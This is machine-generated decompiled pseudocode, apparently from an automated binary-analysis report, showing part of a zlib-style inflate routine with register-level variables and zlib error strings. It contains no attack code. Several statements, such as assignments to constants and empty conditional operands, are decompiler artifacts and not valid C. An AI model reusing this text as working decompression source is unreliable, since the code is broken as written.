                                                                                                                                                  										__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                                                                  										__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                                                                  										if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                                                                  											L260:
                                                                                                                                                  											__esi = _a4;
                                                                                                                                                  											__ecx = __dh & 0x000000ff;
                                                                                                                                                  											__edx = _v16;
                                                                                                                                                  											__edx = _v16 >> __cl;
                                                                                                                                                  											__edi = __edi - __ecx;
                                                                                                                                                  											__eflags = __edi;
                                                                                                                                                  											 *(__ebx + 0x1bc4) = __ecx;
                                                                                                                                                  											goto L261;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L258;
                                                                                                                                                  										}
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L258:
                                                                                                                                                  											__esi = _v8;
                                                                                                                                                  											__eflags = __esi;
                                                                                                                                                  											if(__esi == 0) {
                                                                                                                                                  												goto L331;
                                                                                                                                                  											}
                                                                                                                                                  											__esi = __esi - 1;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											_v8 = __esi;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											__esi = _v12;
                                                                                                                                                  											_v20 = __edi;
                                                                                                                                                  											__edi = __dh & 0x000000ff;
                                                                                                                                                  											 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                                                                  											_v16 = _v16 + (( *__esi & 0x000000ff) << __cl);
                                                                                                                                                  											__esi = __esi + 1;
                                                                                                                                                  											__eax = _v54 & 0x0000ffff;
                                                                                                                                                  											_v12 = __esi;
                                                                                                                                                  											0 = 1;
                                                                                                                                                  											__dl & 0x000000ff = (__dl & 0x000000ff) + __edi;
                                                                                                                                                  											__esi = 1 << __cl;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                  											__esi = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                                                                  											__esi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff);
                                                                                                                                                  											__eax =  *(__ebx + 0x4c);
                                                                                                                                                  											__eax =  *( *(__ebx + 0x4c) + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff)) * 4);
                                                                                                                                                  											__eax = __eax >> 8;
                                                                                                                                                  											__ecx = __cl & 0x000000ff;
                                                                                                                                                  											__ecx = (__cl & 0x000000ff) + __edi;
                                                                                                                                                  											__edi = _v20;
                                                                                                                                                  											__eflags = __ecx - __edi;
                                                                                                                                                  											if(__ecx > __edi) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L260;
                                                                                                                                                  										}
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v28;
                                                                                                                                                  									__eflags = __eax - 0x102;
                                                                                                                                                  									if(__eax < 0x102) {
                                                                                                                                                  										goto L251;
                                                                                                                                                  									}
                                                                                                                                                  									__ebx = _v32;
                                                                                                                                                  									_push(_v44);
                                                                                                                                                  									 *(__esi + 0xc) = _v32;
                                                                                                                                                  									__ebx = _v40;
                                                                                                                                                  									 *(__esi + 0x10) = __eax;
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									 *__esi = _v12;
                                                                                                                                                  									 *(__esi + 4) = __ecx;
                                                                                                                                                  									_push(__esi);
                                                                                                                                                  									 *(__ebx + 0x38) = __edx;
                                                                                                                                                  									 *(__ebx + 0x3c) = __edi;
                                                                                                                                                  									__eax = E000D3840();
                                                                                                                                                  									__eflags =  *__ebx - 0xb;
                                                                                                                                                  									__eax =  *(__esi + 0xc);
                                                                                                                                                  									__edx =  *(__ebx + 0x38);
                                                                                                                                                  									__edi =  *(__ebx + 0x3c);
                                                                                                                                                  									_pop(__ecx);
                                                                                                                                                  									_v32 =  *(__esi + 0xc);
                                                                                                                                                  									__eax =  *(__esi + 0x10);
                                                                                                                                                  									_pop(__ecx);
                                                                                                                                                  									__ecx =  *(__esi + 4);
                                                                                                                                                  									_v28 =  *(__esi + 0x10);
                                                                                                                                                  									__eax =  *__esi;
                                                                                                                                                  									_v12 =  *__esi;
                                                                                                                                                  									_v8 = __ecx;
                                                                                                                                                  									_v16 = __edx;
                                                                                                                                                  									_v20 = __edi;
                                                                                                                                                  									if( *__ebx == 0xb) {
                                                                                                                                                  										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                  									}
                                                                                                                                                  									goto L143;
                                                                                                                                                  								case 0x15:
                                                                                                                                                  									L268:
                                                                                                                                                  									__esi =  *(__ebx + 0x48);
                                                                                                                                                  									__eflags = __esi;
                                                                                                                                                  									if(__esi == 0) {
                                                                                                                                                  										L274:
                                                                                                                                                  										__eax =  *(__ebx + 0x40);
                                                                                                                                                  										 *(__ebx + 0x1bc8) =  *(__ebx + 0x40);
                                                                                                                                                  										 *__ebx = 0x16;
                                                                                                                                                  										goto L275;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __edi - __esi;
                                                                                                                                                  									if(__edi >= __esi) {
                                                                                                                                                  										L273:
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__ecx = __esi;
                                                                                                                                                  										__eax = 1;
                                                                                                                                                  										__edi = __edi - __esi;
                                                                                                                                                  										1 << __cl = (1 << __cl) - 1;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                  										__edx = __edx >> __cl;
                                                                                                                                                  										 *(__ebx + 0x40) =  *(__ebx + 0x40) + __eax;
                                                                                                                                                  										_t601 = __ebx + 0x1bc4;
                                                                                                                                                  										 *_t601 =  *(__ebx + 0x1bc4) + __esi;
                                                                                                                                                  										__eflags =  *_t601;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										goto L274;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - __esi;
                                                                                                                                                  										if(__edi < __esi) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L273;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 0x16:
                                                                                                                                                  									L275:
                                                                                                                                                  									__ecx =  *(__ebx + 0x58);
                                                                                                                                                  									__eax = 0;
                                                                                                                                                  									__esi =  *(__ebx + 0x50);
                                                                                                                                                  									1 = 1 << __cl;
                                                                                                                                                  									__eax = (1 << __cl) - 1;
                                                                                                                                                  									_v52 = __esi;
                                                                                                                                                  									__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                  									__eax =  *(__esi + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                  									1 = 1 >> 8;
                                                                                                                                                  									__ecx = __cl & 0x000000ff;
                                                                                                                                                  									__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                  									if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                  										L279:
                                                                                                                                                  										__eflags = __al & 0x000000f0;
                                                                                                                                                  										if((__al & 0x000000f0) != 0) {
                                                                                                                                                  											L284:
                                                                                                                                                  											__esi = _a4;
                                                                                                                                                  											__eax = __eax >> 8;
                                                                                                                                                  											__ecx = __cl & 0x000000ff;
                                                                                                                                                  											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                  											__edi = __edi - __ecx;
                                                                                                                                                  											__edx = __edx >> __cl;
                                                                                                                                                  											_v16 = __edx;
                                                                                                                                                  											_v20 = __edi;
                                                                                                                                                  											__eflags = __al & 0x00000040;
                                                                                                                                                  											if((__al & 0x00000040) == 0) {
                                                                                                                                                  												__ecx = __eax;
                                                                                                                                                  												 *__ebx = 0x17;
                                                                                                                                                  												__ecx = __eax >> 0x10;
                                                                                                                                                  												__eax = __al & 0x000000ff;
                                                                                                                                                  												__eax = __al & 0xf;
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												 *(__ebx + 0x44) = __ecx;
                                                                                                                                                  												 *(__ebx + 0x48) = __eax;
                                                                                                                                                  												goto L287;
                                                                                                                                                  											}
                                                                                                                                                  											 *(__esi + 0x18) = "invalid distance code";
                                                                                                                                                  											goto L25;
                                                                                                                                                  										}
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										__ecx = __al & 0x000000ff;
                                                                                                                                                  										__ebx = __eax;
                                                                                                                                                  										__edi = 1;
                                                                                                                                                  										__ebx = __eax >> 8;
                                                                                                                                                  										__edx = __eax;
                                                                                                                                                  										__esi = __bl & 0x000000ff;
                                                                                                                                                  										__ecx = (__al & 0x000000ff) + __esi;
                                                                                                                                                  										__eax = __eax >> 0x10;
                                                                                                                                                  										__edi = 1 << __cl;
                                                                                                                                                  										__ecx = __esi;
                                                                                                                                                  										__edi = (1 << __cl) - 1;
                                                                                                                                                  										_v56 = __edx;
                                                                                                                                                  										(1 << __cl) - 0x00000001 & _v16 = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                                                                  										__ecx = _v52;
                                                                                                                                                  										__edi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax;
                                                                                                                                                  										__eax =  *(_v52 + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax) * 4);
                                                                                                                                                  										__ecx = __eax;
                                                                                                                                                  										__edi = _v20;
                                                                                                                                                  										__ecx = __eax >> 8;
                                                                                                                                                  										__esi = __cl & 0x000000ff;
                                                                                                                                                  										__ecx = __bl & 0x000000ff;
                                                                                                                                                  										__ebx = _v40;
                                                                                                                                                  										__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                                                                  										__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                                                                  										if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                                                                  											L283:
                                                                                                                                                  											__ecx = __dh & 0x000000ff;
                                                                                                                                                  											__edx = _v16;
                                                                                                                                                  											__edi = __edi - __ecx;
                                                                                                                                                  											__edx = _v16 >> __cl;
                                                                                                                                                  											_t647 = __ebx + 0x1bc4;
                                                                                                                                                  											 *_t647 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                  											__eflags =  *_t647;
                                                                                                                                                  											goto L284;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L281;
                                                                                                                                                  										}
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L281:
                                                                                                                                                  											__esi = _v8;
                                                                                                                                                  											__eflags = __esi;
                                                                                                                                                  											if(__esi == 0) {
                                                                                                                                                  												goto L331;
                                                                                                                                                  											}
                                                                                                                                                  											__esi = __esi - 1;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											_v8 = __esi;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											__esi = _v12;
                                                                                                                                                  											_v20 = __edi;
                                                                                                                                                  											__edi = __dh & 0x000000ff;
                                                                                                                                                  											 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                                                                  											_v16 = _v16 + (( *__esi & 0x000000ff) << __cl);
                                                                                                                                                  											__esi = __esi + 1;
                                                                                                                                                  											__eax = _v54 & 0x0000ffff;
                                                                                                                                                  											_v12 = __esi;
                                                                                                                                                  											0 = 1;
                                                                                                                                                  											__dl & 0x000000ff = (__dl & 0x000000ff) + __edi;
                                                                                                                                                  											__esi = 1 << __cl;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                  											__esi = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                                                                  											__esi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff);
                                                                                                                                                  											__eax =  *(__ebx + 0x50);
                                                                                                                                                  											__eax =  *( *(__ebx + 0x50) + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff)) * 4);
                                                                                                                                                  											__eax = __eax >> 8;
                                                                                                                                                  											__ecx = __cl & 0x000000ff;
                                                                                                                                                  											__ecx = (__cl & 0x000000ff) + __edi;
                                                                                                                                                  											__edi = _v20;
                                                                                                                                                  											__eflags = __ecx - __edi;
                                                                                                                                                  											if(__ecx > __edi) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L283;
                                                                                                                                                  										}
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__esi = _v8;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __esi;
                                                                                                                                                  										if(__esi == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__esi = __esi - 1;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										_v8 = __esi;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                  										__ecx =  *(__ebx + 0x58);
                                                                                                                                                  										__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                  										_v12 = _v12 + 1;
                                                                                                                                                  										__eax =  *(__ebx + 0x50);
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										0 = 1;
                                                                                                                                                  										1 << __cl = (1 << __cl) - 1;
                                                                                                                                                  										__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                  										__eax =  *( *(__ebx + 0x50) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                                                                  										__ecx = __eax;
                                                                                                                                                  										__edx = _v16;
                                                                                                                                                  										__eax >> 8 = __cl & 0x000000ff;
                                                                                                                                                  										__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                  										if((__cl & 0x000000ff) > __edi) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L279;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 0x17:
                                                                                                                                                  									L287:
                                                                                                                                                  									__ecx =  *(__ebx + 0x48);
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx == 0) {
                                                                                                                                                  										L293:
                                                                                                                                                  										 *__ebx = 0x18;
                                                                                                                                                  										goto L294;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __edi - __ecx;
                                                                                                                                                  									if(__edi >= __ecx) {
                                                                                                                                                  										L292:
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__edi = __edi - __ecx;
                                                                                                                                                  										__eax = 1;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										1 << __cl = (1 << __cl) - 1;
                                                                                                                                                  										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                  										__edx = __edx >> __cl;
                                                                                                                                                  										 *(__ebx + 0x44) =  *(__ebx + 0x44) + __eax;
                                                                                                                                                  										_t670 = __ebx + 0x1bc4;
                                                                                                                                                  										 *_t670 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                  										__eflags =  *_t670;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										goto L293;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L332;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx =  *(__ebx + 0x48);
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - __ecx;
                                                                                                                                                  										if(__edi < __ecx) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L292;
                                                                                                                                                  									}
                                                                                                                                                  									goto L332;
                                                                                                                                                  								case 0x18:
                                                                                                                                                  									L294:
                                                                                                                                                  									__ecx = _v28;
                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                  									if(__ecx == 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v44;
                                                                                                                                                  									__eax = _v44 - __ecx;
                                                                                                                                                  									__ecx =  *(__ebx + 0x44);
                                                                                                                                                  									__eflags = __ecx - __eax;
                                                                                                                                                  									if(__ecx <= __eax) {
                                                                                                                                                  										__eax = _v32;
                                                                                                                                                  										__eax = _v32 - __ecx;
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										_v56 = __eax;
                                                                                                                                                  										__eax =  *(__ebx + 0x40);
                                                                                                                                                  										L305:
                                                                                                                                                  										__ecx = __eax;
                                                                                                                                                  										L306:
                                                                                                                                                  										__esi = _v28;
                                                                                                                                                  										__eflags = __ecx - __esi;
                                                                                                                                                  										__ecx =  >  ? __esi : __ecx;
                                                                                                                                                  										__esi = __esi - __ecx;
                                                                                                                                                  										__eax = __eax - __ecx;
                                                                                                                                                  										_v28 = __esi;
                                                                                                                                                  										__esi = _v56;
                                                                                                                                                  										 *(__ebx + 0x40) = __eax;
                                                                                                                                                  										__ebx = _v32;
                                                                                                                                                  										__esi = _v56 - __ebx;
                                                                                                                                                  										__eflags = __esi;
                                                                                                                                                  										do {
                                                                                                                                                  											__al =  *((intOrPtr*)(__esi + __ebx));
                                                                                                                                                  											 *__ebx = __al;
                                                                                                                                                  											__ebx = __ebx + 1;
                                                                                                                                                  											__ecx = __ecx - 1;
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  										} while (__ecx != 0);
                                                                                                                                                  										__esi = _a4;
                                                                                                                                                  										_v32 = __ebx;
                                                                                                                                                  										__ebx = _v40;
                                                                                                                                                  										__eflags =  *(__ebx + 0x40) - __ecx;
                                                                                                                                                  										if( *(__ebx + 0x40) == __ecx) {
                                                                                                                                                  											 *__ebx = 0x14;
                                                                                                                                                  										}
                                                                                                                                                  										goto L142;
                                                                                                                                                  									}
                                                                                                                                                  									__ecx = __ecx - __eax;
                                                                                                                                                  									__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x2c));
                                                                                                                                                  									if(__ecx <=  *((intOrPtr*)(__ebx + 0x2c))) {
                                                                                                                                                  										L299:
                                                                                                                                                  										__eax =  *(__ebx + 0x34);
                                                                                                                                                  										__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                                                                  										if(__ecx <=  *((intOrPtr*)(__ebx + 0x30))) {
                                                                                                                                                  											__eax = __eax - __ecx;
                                                                                                                                                  											__eax = __eax +  *((intOrPtr*)(__ebx + 0x30));
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  										} else {
                                                                                                                                                  											__ecx = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                                                                  											__eax = __eax +  *((intOrPtr*)(__ebx + 0x28));
                                                                                                                                                  											__eax = __eax - __ecx;
                                                                                                                                                  										}
                                                                                                                                                  										_v56 = __eax;
                                                                                                                                                  										__eax =  *(__ebx + 0x40);
                                                                                                                                                  										__eflags = __ecx - __eax;
                                                                                                                                                  										if(__ecx <= __eax) {
                                                                                                                                                  											goto L306;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L305;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(__ebx + 0x1bc0);
                                                                                                                                                  									if( *(__ebx + 0x1bc0) == 0) {
                                                                                                                                                  										goto L299;
                                                                                                                                                  									}
                                                                                                                                                  									 *(__esi + 0x18) = "invalid distance too far back";
                                                                                                                                                  									goto L25;
                                                                                                                                                  								case 0x19:
                                                                                                                                                  									__eflags = _v28;
                                                                                                                                                  									if(_v28 == 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__esi = _v32;
                                                                                                                                                  									__al =  *(__ebx + 0x40);
                                                                                                                                                  									_v32 = _v32 + 1;
                                                                                                                                                  									_v28 = _v28 - 1;
                                                                                                                                                  									 *_v32 = __al;
                                                                                                                                                  									__esi = _a4;
                                                                                                                                                  									 *__ebx = 0x14;
                                                                                                                                                  									goto L143;
                                                                                                                                                  								case 0x1a:
                                                                                                                                                  									__eflags =  *(__ebx + 8);
                                                                                                                                                  									if ( *(__ebx + 8) == 0) goto L315;
                                                                                                                                                  									__eflags = _v2097152004 & __bh;
                                                                                                                                                  								case 0x1b:
                                                                                                                                                  									__eax = 0;
                                                                                                                                                  									__eflags =  *(__ebx + 8);
                                                                                                                                                  									if( *(__ebx + 8) == 0) {
                                                                                                                                                  										L327:
                                                                                                                                                  										 *__ebx = 0x1c;
                                                                                                                                                  										goto L328;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(__ebx + 0x10);
                                                                                                                                                  									if( *(__ebx + 0x10) == 0) {
                                                                                                                                                  										goto L327;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __edi - 0x20;
                                                                                                                                                  									if(__edi >= 0x20) {
                                                                                                                                                  										L323:
                                                                                                                                                  										__eflags = __edx -  *((intOrPtr*)(__ebx + 0x1c));
                                                                                                                                                  										if(__edx ==  *((intOrPtr*)(__ebx + 0x1c))) {
                                                                                                                                                  											_v16 = __eax;
                                                                                                                                                  											__edi = __eax;
                                                                                                                                                  											goto L327;
                                                                                                                                                  										}
                                                                                                                                                  										 *(__esi + 0x18) = "incorrect length check";
                                                                                                                                                  										L25:
                                                                                                                                                  										 *_t815 = 0x1d;
                                                                                                                                                  										L142:
                                                                                                                                                  										_t819 = _v8;
                                                                                                                                                  										goto L143;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										__eflags = __edi - 0x20;
                                                                                                                                                  										if(__edi < 0x20) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										goto L323;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 0x1c:
                                                                                                                                                  									L328:
                                                                                                                                                  									__eax = 0;
                                                                                                                                                  									__eax = 1;
                                                                                                                                                  									goto L330;
                                                                                                                                                  								case 0x1d:
                                                                                                                                                  									_push(0xfffffffd);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									L330:
                                                                                                                                                  									_v36 = __eax;
                                                                                                                                                  									L331:
                                                                                                                                                  									_t826 = _v8;
                                                                                                                                                  									L332:
                                                                                                                                                  									_t850 = _a4;
                                                                                                                                                  									_t850[3] = _v32;
                                                                                                                                                  									_t850[4] = _v28;
                                                                                                                                                  									_t838 = 0;
                                                                                                                                                  									 *_t850 = _v12;
                                                                                                                                                  									_t850[1] = _t826;
                                                                                                                                                  									_t815[0xf] = _t844;
                                                                                                                                                  									_t845 = _v44;
                                                                                                                                                  									_t815[0xe] = _v16;
                                                                                                                                                  									__eflags = _t815[0xa];
                                                                                                                                                  									if(_t815[0xa] != 0) {
                                                                                                                                                  										L337:
                                                                                                                                                  										_t799 = E000D2DCB(_t850, _t850[3], _t845 - _t850[4]);
                                                                                                                                                  										__eflags = _t799;
                                                                                                                                                  										if(_t799 == 0) {
                                                                                                                                                  											_t838 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											L341:
                                                                                                                                                  											_t801 = _v60 - _t850[1];
                                                                                                                                                  											_t846 = _t845 - _t850[4];
                                                                                                                                                  											_t850[2] = _t850[2] + _t801;
                                                                                                                                                  											_t850[5] = _t850[5] + _t846;
                                                                                                                                                  											_t815[7] = _t815[7] + _t846;
                                                                                                                                                  											_v60 = _t801;
                                                                                                                                                  											__eflags = _t815[2] - _t838;
                                                                                                                                                  											if(_t815[2] != _t838) {
                                                                                                                                                  												__eflags = _t846;
                                                                                                                                                  												if(_t846 != 0) {
                                                                                                                                                  													_push(_t846);
                                                                                                                                                  													_push(_t850[3] - _t846);
                                                                                                                                                  													_push(_t815[6]);
                                                                                                                                                  													__eflags = _t815[4] - _t838;
                                                                                                                                                  													if(_t815[4] == _t838) {
                                                                                                                                                  														_t811 = E000D2E91();
                                                                                                                                                  													} else {
                                                                                                                                                  														_t811 = E000D30C1();
                                                                                                                                                  													}
                                                                                                                                                  													_t815[6] = _t811;
                                                                                                                                                  													_t838 = 0;
                                                                                                                                                  													__eflags = 0;
                                                                                                                                                  													_t850[0xc] = _t811;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *_t815 - 0x13;
                                                                                                                                                  											if( *_t815 == 0x13) {
                                                                                                                                                  												L349:
                                                                                                                                                  												_t838 = 0x100;
                                                                                                                                                  												goto L350;
                                                                                                                                                  											} else {
                                                                                                                                                  												__eflags =  *_t815 - 0xe;
                                                                                                                                                  												if( *_t815 != 0xe) {
                                                                                                                                                  													L350:
                                                                                                                                                  													_a4 = 0x80;
                                                                                                                                                  													asm("sbb ecx, ecx");
                                                                                                                                                  													__eflags =  *_t815 - 0xb;
                                                                                                                                                  													_t803 =  ==  ? _a4 : 0;
                                                                                                                                                  													_t804 = ( ==  ? _a4 : 0) + ( ~(_t815[1]) & 0x00000040) + _t838;
                                                                                                                                                  													_t805 = ( ==  ? _a4 : 0) + ( ~(_t815[1]) & 0x00000040) + _t838 + _t815[0xf];
                                                                                                                                                  													_t850[0xb] = ( ==  ? _a4 : 0) + ( ~(_t815[1]) & 0x00000040) + _t838 + _t815[0xf];
                                                                                                                                                  													__eflags = _v60;
                                                                                                                                                  													if(_v60 != 0) {
                                                                                                                                                  														L352:
                                                                                                                                                  														__eflags = _a8 - 4;
                                                                                                                                                  														if(_a8 != 4) {
                                                                                                                                                  															return _v36;
                                                                                                                                                  														}
                                                                                                                                                  														L353:
                                                                                                                                                  														_t807 = _v36;
                                                                                                                                                  														__eflags = _t807;
                                                                                                                                                  														_push(0xfffffffb);
                                                                                                                                                  														_pop(_t831);
                                                                                                                                                  														_t808 =  ==  ? _t831 : _t807;
                                                                                                                                                  														return  ==  ? _t831 : _t807;
                                                                                                                                                  													}
                                                                                                                                                  													__eflags = _t846;
                                                                                                                                                  													if(_t846 == 0) {
                                                                                                                                                  														goto L353;
                                                                                                                                                  													}
                                                                                                                                                  													goto L352;
                                                                                                                                                  												}
                                                                                                                                                  												goto L349;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										 *_t815 = 0x1e;
                                                                                                                                                  										goto L339;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t845 - _t850[4];
                                                                                                                                                  									if(_t845 == _t850[4]) {
                                                                                                                                                  										goto L341;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *_t815 - 0x1d;
                                                                                                                                                  									if( *_t815 >= 0x1d) {
                                                                                                                                                  										goto L341;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *_t815 - 0x1a;
                                                                                                                                                  									if( *_t815 < 0x1a) {
                                                                                                                                                  										goto L337;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _a8 - 4;
                                                                                                                                                  									if(_a8 == 4) {
                                                                                                                                                  										goto L341;
                                                                                                                                                  									}
                                                                                                                                                  									goto L337;
                                                                                                                                                  								case 0x1e:
                                                                                                                                                  									L339:
                                                                                                                                                  									_push(0xfffffffc);
                                                                                                                                                  									goto L145;
                                                                                                                                                  							}
                                                                                                                                                  							L143:
                                                                                                                                                  							_t776 =  *_t815;
                                                                                                                                                  						} while (_t776 <= 0x1e);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}






























                                                                                                                                                  0x000d1744
                                                                                                                                                  0x000d174a
                                                                                                                                                  0x000d1dd0
                                                                                                                                                  0x000d1dd0
                                                                                                                                                  0x000d1dd2
                                                                                                                                                  0x000d1dd2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d1dd2
                                                                                                                                                  0x000d1750
                                                                                                                                                  0x000d1753
                                                                                                                                                  0x000d1758
